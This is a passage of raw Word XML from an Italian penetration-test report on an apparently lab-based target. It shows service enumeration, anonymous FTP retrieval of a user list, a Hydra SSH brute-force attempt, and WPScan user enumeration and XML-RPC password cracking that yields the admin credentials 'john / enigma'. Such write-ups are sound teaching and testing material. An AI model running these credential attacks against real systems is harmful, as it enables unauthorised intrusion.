                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp</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04B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH</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04C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH 5.9p1 (Debian 5ubuntu1.10, Ubuntu Linux, protocollo 2.0)</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4D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp</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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP</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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache httpd 2.2.22 (Ubuntu)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il target espone tre servizi di rete. Le versioni identificate risultano particolarmente datate rispetto agli standard attuali:</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vsftpd 2.3.5: versione storicamente associata a una nota backdoor (CVE-2011-2523) e comunque priva delle protezioni presenti nelle versioni più recenti del demone FTP;</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OpenSSH 5.9p1 su Ubuntu risalente: versione obsoleta, potenzialmente soggetta a debolezze di configurazione (es. metodi di autenticazione non standard, come verificato nella Fase successiva);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Apache 2.2.22 su Ubuntu: versione end-of-life, non più supportata da patch di sicurezza ufficiali, che costituisce la superficie di attacco primaria in quanto ospita l'applicazione web analizzata nella Fase 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La combinazione di software obsoleto su tre servizi distinti suggerisce un sistema non soggetto ad aggiornamenti regolari, elemento che aumenta significativamente la probabilità di successo di un attacco basato su vulnerabilità note o su configurazioni deboli.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Fase 2: Enumerazione Web Application e Servizi Ausiliari</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificare la robustezza dei servizi esposti (FTP, SSH) e procedere con l'enumerazione approfondita dell'applicazione web, in particolare del CMS WordPress individuato sul server, alla ricerca di informazioni sensibili, utenti validi e credenziali deboli.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Client FTP a riga di comando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Hydra — attacco a dizionario su servizi di rete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cURL — interrogazione diretta del servizio HTTP</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WPScan — enumerazione e attacco a dizionario su installazioni WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data la natura spesso permissiva dei servizi FTP mal configurati, è stato verificato per primo l'accesso al servizio in ascolto sulla porta 21:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>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90"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="909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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp 192.168.1.12</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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3352800" cy="1000125"/>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3528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60" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stato tentato l'accesso con l'utenza anonima (anonymous), tecnica comune per verificare configurazioni FTP permissive:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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4962525" cy="2038350"/>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96252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300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'accesso anonimo è stato accettato dal server. All'interno della directory "public" è stato individuato il file users.txt.bk, prelevato tramite il comando get:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="916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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp&gt; cd public</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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp&gt; ls -la</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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp&gt; get users.txt.bk</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">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5334000" cy="424815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340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line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il contenuto del file trasferito è stato analizzato in locale:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cat users.txt.bk</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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2371725" cy="1266825"/>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3717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60" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'elenco di utenze ottenuto è stato utilizzato come base per un tentativo di attacco a dizionario contro il servizio SSH, impiegando la wordlist rockyou.txt:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>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85"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="898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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra -L users.txt.bk -P /usr/share/wordlists/rockyou.txt -t 4 -V ssh://192.168.1.12</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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5334000" cy="523875"/>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340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line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il servizio SSH risulta configurato per non accettare l'autenticazione tramite password (verosimilmente richiede autenticazione a chiave pubblica), impedendo l'attacco a dizionario diretto. L'attenzione è stata quindi spostata sul servizio HTTP esposto sulla porta 80:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="919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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://192.168.1.12/</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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5334000" cy="8001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340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line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La root del sito espone unicamente la pagina di default di Apache. È stato quindi verificato il file robots.txt, spesso rivelatore di percorsi non destinati all'indicizzazione ma comunque accessibili:</w:t>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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://192.168.1.12/robots.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">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4267200" cy="1323975"/>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2672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300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il file robots.txt ha rivelato l'esistenza del percorso /backup_wordpress, non raggiungibile dalla navigazione ordinaria del sito. Su tale percorso è stata quindi lanciata un'enumerazione con WPScan:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1000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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">wpscan --url http://192.168.1.12/backup_wordpress --enumerate u</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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5334000" cy="6143625"/>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34000" cy="61436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5334000" cy="3514725"/>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340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line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan ha identificato una versione di WordPress (4.5) datata 2016 e priva delle patch di sicurezza successive, un tema non aggiornato, l'endpoint XML-RPC abilitato (superficie utilizzabile per attacchi a dizionario a basso rumore) e due nomi utente validi: john e admin. Sfruttando l'endpoint XML-RPC, meno soggetto a meccanismi di rate-limiting rispetto al form di login standard, è stato lanciato un attacco a dizionario mirato sull'utente john:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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30"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="903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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">wpscan --url http://192.168.1.12/backup_wordpress --usernames john --passwords /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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5334000" cy="2171700"/>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34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60" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</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82">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Elemento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3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dettaglio</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84">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Servizio FTP</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5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Accesso anonimo consentito; file users.txt.bk esposto pubblicamente</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086">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Servizio SSH</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087">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticazione a password disabilitata (non sfruttabile via dizionario)</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88">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Percorso nascosto</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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/backup_wordpress rivelato tramite robots.txt</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08A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CMS identificato</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08B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WordPress 4.5 (obsoleto), tema Twenty Sixteen 1.2, XML-RPC abilitato</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8C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Utenti WordPress enumerati</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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">john, admin</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08E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenziali compromesse</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08F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">john / enigma (ruolo Administrator)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
